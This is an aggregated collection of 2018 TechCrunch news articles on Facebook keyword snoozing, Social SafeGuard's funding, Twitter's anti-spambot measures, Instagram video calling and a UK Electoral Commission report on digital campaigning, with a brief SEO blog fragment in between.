Don’t want to know the ending to a World Cup game or Avengers movie until you’ve watched it, or just need to quiet an exhausting political topic like “Trump”? Facebook is now testing the option to “snooze” specific keywords so you won’t see them for 30 days in News Feed or Groups. The feature is rolling out to a small percentage of users today. It could make people both more comfortable browsing the social network when they’re trying to avoid something, and not feel guilty posting about sensitive topics.

The feature was first spotted in the Facebook’s app’s code by Chris Messina on Sunday, who told TechCrunch he found a string for “snooze keywords for 30 days”. We reached out to Facebook on Monday, which didn’t initially respond, but last night provided details we could publish at 5am this morning ahead of an official announcement later today. The test follows the roll out of snoozing people, Pages, and Groups from last December.

To snooze a keyword, you first have to find a post that includes it. That kind of defeats the whole purpose since you might run into the spoiler you didn’t want to see. But when asked about that problem, a Facebook spokesperson told me the company is looking into adding a preemptive snooze option in the next few weeks, potentially in News Feed Preferences. It’s also considering a recurring snooze list so you could easily re-enable hiding your favorite sports team before any game you’ll have to watch on delay.

For now, though, when you see the word you can hit the drop-down arrow on the post which will reveal an option to “snooze keywords in this post”. Tapping that reveals a list of nouns from the post you might want to nix, without common words like “the” in the way. So if you used the feature on a post that said “England won its World Cup game against Tunisia! Yes!”, the feature would pull out “World Cup”, “England”, and “Tunisia”. Select all that you want to snooze, and posts containing them will be hidden for a month. Currently, the feature only works on text, not images, and won’t suggest synonyms you might want to snooze as well.

The spokesperson says the feature “was something that kept coming up” in Facebook interviews with users. The option applies to any organic content, but you can’t block ads with it, so if you snoozed “Deadpool” you wouldn’t see posts from friends about the movie but still might see ads to buy tickets. Facebook’s excuse for this is that ads belong to a “a separate team, separate algorithm” but surely it just doesn’t want to open itself up to users mass-blocking its revenue driver. The spokesperson also said that snoozing isn’t currently being used for other content and ad targeting purposes.

We asked why users can’t permanently mute keywords like Twitter launched in November 2016, or the way Instagram launched keyword blocking for your posts’ comments in September 2016. Facebook says “If we’re hearing from people that they want more or less time” that might get added as the feature rolls out beyond a test. There is some sense to defaulting to only temporary muting, as users might simply forget they blocked their favorite sports team before a big game, and then wouldn’t see it mentioned forever after.

But when it comes to abuse, permanent muting is something Facebook really should offer. Instead it’s relied on users flagging abuse like racial slurs, and it recently revealed its content moderation guidelines. Some topics that are fine for others could be tough for certain people to see, though, and helping users prevent trauma probably deserves to be prioritized above stopping reality TV spoilers.



source https://techcrunch.com/2018/06/27/facebook-keyword-snooze/

Social SafeGuard scores $11M to sell alerts for brand-damaging fakes

Social SafeGuard, a 2014-founded U.S. startup which sells security services to enterprises aimed at mitigating a range of digital risks that lie outside the corporate firewall, has closed an $11 million Series B funding round, from AllegisCyber and NightDragon Security.

It’s hoping to ride the surge in awareness around social media fakery — putting the new funding towards sales and marketing, plus some product dev.

“As one of the few dedicated cybersecurity venture firms, we know how big this challenge has become for today’s security executives,” said Spencer Tall, MD of AllegisCyber, in a supporting statement. Tall is joining the Social SafeGuard board.

“This is no longer a fringe need that can be ignored or deferred. Digital risk protection should be on the shortlist of corporate security priorities for the next decade,” he adds.

Social SafeGuard’s SaaS platform is designed to alert customers to risks that might cause damage to a business or brand’s reputation — such as brand impersonation, compliance issues or even the spread of fake news — as well as more pure-play security threats, such as social phishing, malware, spam and fake accounts.

Its platform uses machine learning and a customized policy engine to offer real-time monitoring of 50 digital and social channels (integrating via an API hub) — including social media platforms, mobile messaging apps, IM tools like Slack, unified comms platforms (Skype for business etc), clouds apps like Office365, blogs and news sites, and the dark web.

The types of threats the platform is trained to look out for include malicious message content, inappropriate images, malicious links, account takeover attempts and brand impersonation.

“Digital risks to any enterprise are twofold: internal or external — from employees communicating in non-compliant ways that expose a business to regulatory danger to more typical cyber threats like phishing, malware, account hacks or brand impersonation. Social SafeGuard helps mitigate all of these new digital risks by giving companies the tools to detect threats and defend against them, so they can adopt new technologies without fear,” says founder and CEO Jim Zuffoletti.

As well as threat detection and real-time notification, the platform includes built in take-down requests and follow-through — “to make threat management as responsive as possible”, as he puts it.

Social SafeGuard’s software also does risk scoring to aid the rapid triage of potential threats, and uses AI to try to anticipate “potential attacks and identify known bad actors” — so it’s responding to a wider security industry shift from purely defensive, reactive actions towards pro-active detection and response.

On the compliance front, the platform includes a governance and customizable policy engine that enterprises can use to monitor employee and partner communications for regulatory violations.

“For compliance-focused clients, messages are archived with automated audit trails that provide transparency and clarity,” notes Zuffoletti.

The platform has around 50 customers at this stage. Zuffoletti says its biggest customers are in the financial services and life sciences sectors — but says high tech is its fastest-growing sector.

Examples of the kinds of attacks its tools have been used to prevent include account takeovers, malware attacks, financial regulations violations, and FCPA and HIPAA violations.

“In one recent example, we were able to perform a forensic analysis of an online securities fraud scheme, which also posed brand reputation issues for one of our clients,” he adds. “Our platform is adaptable to evolving hybrid threats, too.”

On the competitive front, Zuffoletti namechecks the likes of Proofpoint and RiskIQ.



source https://techcrunch.com/2018/06/27/social-safeguard-scores-11m-to-sell-alerts-for-brand-damaging-fakes/

Twitter puts a tighter squeeze on spambots

Twitter has announced a range of actions intended to bolster efforts to fight spam and “malicious automation” (aka bad bots) on its platform — including increased security measures around account verification and sign-up; running a historical audit to catch spammers who signed up when its systems were more lax; and taking a more proactive approach to identifying spam activity to reduce its ability to make an impact.

It says the new steps build on previously announced measures to fight abuse and trolls, and new policies on hateful conduct and violent extremism.

The company has also recently been publicly seeking new technology and staff to fight spam and abuse.

All of which is attempting to turn around Twitter’s reputation for being awful at tackling abuse.

“Our focus is increasingly on proactively identifying problematic accounts and behavior rather than waiting until we receive a report,” Twitter’s Yoel Roth and Del Harvey write in the latest blog update. “We focus on developing machine learning tools that identify and take action on networks of spammy or automated accounts automatically. This lets us tackle attempts to manipulate conversations on Twitter at scale, across languages and time zones, without relying on reactive reports.”

“Platform manipulation and spam are challenges we continue to face and which continue to evolve, and we’re striving to be more transparent with you about our work,” they add, after giving a progress update on the performance of its anti-spambot systems, saying they picked up more than 9.9M “potentially spammy or automated accounts” per week in May, up from 6.4M in December 2017 and 3.2M in September.

Among the welcome — if VERY long overdue — changes is an incoming requirement for new accounts to confirm either an email address or phone number when they sign up, in order to make it harder for people to register spam accounts.

“This is an important change to defend against people who try to take advantage of our openness,” they write. “We will be working closely with our Trust & Safety Council and other expert NGOs to ensure this change does not hurt someone in a high-risk environment where anonymity is important. Look for this to roll out later this year.”

The company has also been wading into its own inglorious legacy of spam failure by conducting historical audits of some legacy sign-up systems to try to clear bad actors off the platform.

Well, better late than never as they say.

Twitter says it’s already identified “a large number” of suspected spam accounts as a result of investigating misuse of an old part of its signup flow — saying these are “primarily follow spammers”, i.e. spambots who automatically or bulk followed verified or other high-profile accounts at the point of sign up.

And it says it will be challenging these accounts to prove its ‘spammer’ classification wrong.

As a result of this it warns that some users may see a drop in their follow counts.

“When we challenge an account, follows originating from that account are hidden until the account owner passes that challenge. This does not mean accounts appearing to lose followers did anything wrong; they were the targets of spam that we are now cleaning up,” it writes. “We’ve recently been taking more steps to clean up spam and automated activity and close the loopholes they’d exploited, and are working to be more transparent about these kinds of actions.”

“Our goal is to ensure that every account created on Twitter has passed some simple, automatic security checks designed to prevent automated signups. The new protections we’ve developed as a result of this audit have already helped us prevent more than 50,000 spammy signups per day,” it adds.

As part of this shift in approach to reduce the visibility and power of spambots by impacting their ability to bogusly influence genuine users, Twitter has also tweaked how it displays follower and like counts across its platform — saying it’s now updating account metrics in “near-real time”.

So it warns users they may notice their accounts metrics changing more regularly.

“But we think this is an important shift in how we display Tweet and account information to ensure that malicious actors aren’t able to artificially boost an account’s credibility permanently by inflating metrics like the number of followers,” it adds — noting also that it’s taking additional steps to reduce spammer visibility which it will have more to say about “in the coming weeks”.

Another change Twitter is flagging up now is an expansion of its malicious behavior detection systems. On this it says it’s automating some processes where it sees suspicious account activity — such as “exceptionally high-volume tweeting with the same hashtag, or using the same @handle without a reply from the account you’re mentioning”.

And while that’s clearly great news for anyone who hates high volume spam — and the damage spamming can very evidently do — it’s also a crying shame it’s taken Twitter this long to take these kinds of obvious problems seriously.

Better late than never is pretty cold comfort when you consider the ugly social divisions that malicious entities have fueled by being so freely able to misappropriate the amplification power of social media. Because tech CEOs were essentially asleep at the wheel — and deaf to the warnings being sounded about their tools for years.

There’s clearly a human cost to platforms prioritizing growth at the expense of wider societal responsibilities, as Facebook has also been realizing of late.

And while both these companies may be trying to clean house now they have no quick fixes for mending rips in the social fabric which were exacerbated as a consequence of the at-scale spreading of fake news and worse enabled by their own platforms.

Though, in March, Twitter CEO Jack Dorsey put out a call for ideas to help it capture, measure and evaluate healthy interactions on its platform and the health of public conversations generally — saying: “Ultimately we want to have a measurement of how it affects the broader society and public health, but also individual health, as well.”

So a differently stripped, more civically minded Twitter is seeking to emerge from the bushes.

Twitter users who fall foul of its new automated malicious behavior checks can expect to have to pass some sort of ‘no, actually I am human’ test — which it says will “vary in intensity”, giving examples such as a simple reCAPTCHA process, at the lowest friction end, or a slightly more arduous password reset request.

“More complex cases are automatically passed to our team for review,” it adds.

There’s also an appeals process for users who believe they have been incorrectly IDed by one of the automated spam detection systems — letting them request a case review.

Another welcome if tardy addition: Twitter has added support for stronger two-factor authentication as Twitter users will now be able to use a USB security key (using the U2F open authentication standard) for login verification when signing into Twitter.

It urges users to enable 2FA if they haven’t already, and regularly review third party apps attached to their account to revoke access they no longer wish to grant.

The company finishes by saying it will continue to invest “across the board” to try to tackle spam and malicious automated activity, including by “leveraging machine learning technology and partnerships with third parties” — saying: “These issues are felt around the world, from elections to emergency events and high-profile public conversations. As we have stated in recent announcements, the public health of the conversation on Twitter is a critical metric by which we will measure our success in these areas.”

The results of a Request for Proposals for public health metrics research which Twitter called for earlier this year will be announced soon, it adds.



source https://techcrunch.com/2018/06/27/twitter-puts-a-tighter-squeeze-on-spambots/

Tuesday, 26 June 2018

Instagram now lets you 4-way group video chat as you browse

Instagram’s latest assault on Snapchat, FaceTime, and Houseparty launches today. TechCrunch scooped back in March that Instagram would launch video calling, and the feature was officially announced in at F8 in May. Now it’s actually rolling out to everyone on iOS and Android, allowing up to four friends to group video call together through Instagram Direct.

With the feed, Stories, messaging, Live, IGTV, and now video calling, Instagram is hoping to become a one-stop-shop for its 1 billion users’ social needs. This massive expansion in functionality over the past two years is paying off according to SimilarWeb, which estimates that the average US user has gone from spending 29 minutes per day on the app in September 2017 to 55 minutes today. More time spent means more potential ad views and revenue for the Facebook subsidiary that a Bloomberg analyst just valued at $100 billion after it was bought for less than $1 billion in 2012.

One cool feature of Instagram Video Calling is that you can minimize the window and bounce around the rest of Instagram without ending the call. That opens new opportunities for co-browsing with friends as if you were hanging out together. More friends can join an Instagram call in progress, though you can mute them if you don’t want to get more call invites. You’re allowed to call anyone you can Direct message by hitting the video button in a chat, and blocked people can’t call you.

Here’s how Instagram’s group video calling stacks up to the alternatives:

  • Instagram – 4-way plus simultaneous browsing
  • Snapchat – 16-way
  • FaceTime – 32-way (coming in iOS 12 this fall)
  • Houseparty – 8-way per room with limitless parallel rooms
  • Facebook Messenger – 6-way with up to 50 people listening via audio

Instagram is also rolling out two more features promised at F8. The Explore page will now be segmented to show a variety of topic channels that reveal associated content below. Previously, Explore’s 200 million daily users just saw a random mish-mash of popular content related to their interests, with just a single “Videos You Might Like” section separated.

Now users will see a horizontal tray of channels atop Explore, including an algorithmically personalized For You collection, plus ones like Art, Beauty, Sports, and Fashion depending on what content you regularly interact with. Users can swipe between the categories to browse, and then scroll up to view more posts from any they enjoy. A list of sub-hashtags appears when you open a category, like #MoGraph (motion graphics) or #Typeface when you open art. And if you’re sick of seeing a category, you can mute it. Strangely, Instagram has stripped Stories out of Explore entirely, but when asked, the team told us it plans to bring Stories back in the near future.

The enhanced Explore page could make it easier for people to discover new creators. Growing the audience of these content makers is critical to Instagram as it strives to be their favorite app amongst competition. Snapchat lacks a dedicated Explore section or other fan base-growing opportunities, which has alienated some creators, while the new Instagram topic channels is reminiscent of YouTube’s mobile Trending page.

Instagram’s new Explore Channels (left) vs YouTube’s Trending page (right)

Finally, Instagram is rolling out Camera Effects design by partners, starting with Ariana Grande, BuzzFeed, Liz Koshy, Baby Ariel, and the NBA. If you’re following these accounts, you’ll see their effect in the Stories camera, and you can hit Try It On if you spot a friend using one you like. This opens the door to accounts all offering their own augmented reality and 2D filters without the Stories camera becoming overstuffed with lenses you don’t care about.

Instagram’s new partner-made camera effects

What’s peculiar is that all of these features are designed to boost the amount of time you spend on Instagram just as it’s preparing to launch a Usage Insights dashboard for tracking if you’re becoming addicted to the app. At least the video calling and camera effects promote active usage, but Explore definitely encourages passive consumption that research shows can be unhealthy.

Therein lies the rub of Instagram’s mission and business model with its commitment to user wellbeing. Despite CEO Kevin Systrom’s stated intention that  “any time [spent on his app] should be positive and intentional“ and that he wants Instagram to “be part of the solution”, the company earns more by keeping people glued to the screen rather than present in their lives.



source https://techcrunch.com/2018/06/26/instagram-group-video-calling/

How We Encourage Side Hustles

BuzzSumo: The Definitive Guide

The Advanced SEO Formula That Helped Me Rank For 477,000 Keywords

seo neil patel

Can you guess how many keywords I rank for?

Well, you are probably going to say 477,000 because I used that number in the title of this post.

source https://neilpatel.com/blog/keyword-research-formula/

Digital campaigning vs democracy: UK election regulator calls for urgent law changes

A report by the UK’s Electoral Commission has called for urgent changes in the law to increase transparency about how digital tools are being used for political campaigning, warning that an atmosphere of mistrust is threatening the democratic process.

The oversight body, which also regulates campaign spending, has spent the past year examining how digital campaigning was used in the UK’s 2016 EU referendum and 2017 general election — as well as researching public opinion to get voters’ views on digital campaigning issues.

Among the changes the Commission wants to see is greater clarity around election spending to try to prevent foreign entities pouring money into domestic campaigns, and beefed up financial regulations including bigger penalties for breaking election spending rules.

It also has an ongoing investigation into whether pro-Brexit campaigns — including the official Vote Leave campaign — broke spending rules. And last week the BBC reported on a leaked draft of the report suggesting the Commission will find the campaigns broke the law.

Last month the Leave.EU Brexit campaign was also fined £70,000 after a Commission investigation found it had breached multiple counts of electoral law during the referendum.

Given the far larger sums now routinely being spent on elections — another pro-Brexit group, Vote Leave, had a £7M spending limit (though it has also been accused of exceeding that) — it’s clear the Commission needs far larger teeth if it’s to have any hope of enforcing the law.

Digital tools have lowered the barrier of entry for election fiddling, while also helping to ramp up democratic participation.

“On digital campaigning, our starting point is that elections depend on participation, which is why we welcome the positive value of online communications. New ways of reaching voters are good for everyone, and we must be careful not to undermine free speech in our search to protect voters. But we also fully recognise the worries of many, the atmosphere of mistrust which is being created, and the urgent need for action to tackle this,” writes commission chair John Holmes.

“Funding of online campaigning is already covered by the laws on election spending and donations. But the laws need to ensure more clarity about who is spending what, and where and how, and bigger sanctions for those who break the rules.

“This report is therefore a call to action for the UK’s governments and parliaments to change the rules to make it easier for voters to know who is targeting them online, and to make unacceptable behaviour harder. The public opinion research we publish alongside this report demonstrates the level of concern and confusion amongst voters and the will for new action.”

The Commission’s key recommendations are:

  • Each of the UK’s governments and legislatures should change the law so that digital material must have an imprint saying who is behind the campaign and who created it
  • Each of the UK’s governments and legislatures should amend the rules for reporting spending. They should make campaigners sub-divide their spending returns into different types of spending. These categories should give more information about the money spent on digital campaigns
  • Campaigners should be required to provide more detailed and meaningful invoices from their digital suppliers to improve transparency
  • Social media companies should work with us to improve their policies on campaign material and advertising for elections and referendums in the UK
  • UK election and referendum adverts on social media platforms should be labelled to make the source clear. Their online databases of political adverts should follow the UK’s rules for elections and referendums
  • Each of the UK’s governments and legislatures should clarify that spending on election or referendum campaigns by foreign organisations or individuals is not allowed. They would need to consider how it could be enforced and the impact on free speech
  • We will make proposals to campaigners and each of the UK’s governments about how to improve the rules and deadlines for reporting spending. We want information to be available to voters and us more quickly after a campaign, or during
  • Each of the UK’s governments and legislatures should increase the maximum fine we can sanction campaigners for breaking the rules, and strengthen our powers to obtain information outside of an investigation

The recommendations follow revelations by Chris Wylie, the Cambridge Analytica whistleblower (pictured at the top of this post) — who has detailed to journalists and regulators how Facebook users’ personal data was obtained and passed to the now defunct political consultancy for political campaigning activity without people’s knowledge or consent.

In addition to the Cambridge Analytica data misuse scandal, Facebook has also been rocked by earlier revelations of how extensively Kremlin-backed agents used its ad targeting tools to try to sew social division at scale — including targeting the 2016 US presidential election.

The Facebook founder, Mark Zuckerberg, has since been called before US and EU lawmakers to answer questions about how his platform operates and the risks it’s posing to democratic processes.

The company has announced a series of changes intended to make it more difficult for third parties to obtain user data, and to increase transparency around political advertising — adding a requirement for such ads to continue details of how has paid for them, for example, and also offering a searchable archive.

Although critics question whether the company is going far enough — asking, for example, how it intends to determine what is and is not a political advert.

Facebook is not offering a searchable archive for all ads on its platform, for example.

Zuckerberg has also been accused of equivocating in the face of lawmakers’ concerns, with politicians on both sides of the Atlantic calling him out for providing evasive, misleading or intentionally obfuscating responses to concerns and questions around how his platform operates.

The Electoral Commission makes a direct call for social media firms to do more to increase transparency around digital political advertising and remove messages which “do not meet the right standards”.

“If this turns out to be insufficient, the UK’s governments and parliaments should be ready to consider direct regulation,” it also warns. 

We’ve reached out to Facebook comment and will update this post with any response.

A Cabinet Office spokeswoman told us it would send the government response to the Electoral Commission report shortly — so we’ll also update this post when we have that.

The UK’s data protection watchdog, the ICO, has an ongoing investigating into the use of social media data for political campaigning — and commissioner Elizabeth Denham recently made a call for stronger disclosure rules around political ads and a code of conduct for social media firms. The body is expected to publish the results of its long-running investigation shortly.

At the same time, a DCMS committee has been running an inquiry into the impact of fake news and disinformation online, including examining the impact on the political process. Though Zuckerberg has declined its requests for him to personally testify — sending a number of minions in his place, including CTO Mike Schroepfer who was grilled for around five hours by irate MPs and his answers still left them dissatisfied.

The committee will set out the results of this inquiry in another report touching on the impact of big tech on democratic processes — likely in the coming months. Committee chair Damian Collins tweeted today to say the inquiry has “also highlighted how out of date our election laws are in a world increasingly dominated by big tech media”.

On its forthcoming Brexit campaign spending report, an Electoral Commission spokesperson told us: “In accordance with its Enforcement Policy, the Electoral Commission has written to Vote Leave, Mr Darren Grimes and Veterans for Britain to advise each campaigner of the outcome of the investigation announced on 20 November 2017. The campaigners have 28 days to make representations before final decisions are taken. The Commission will announce the outcome of the investigation and publish an investigation report once this final decision has been taken.”



source https://techcrunch.com/2018/06/26/digital-campaigning-vs-democracy-uk-election-regulator-calls-for-urgent-law-changes/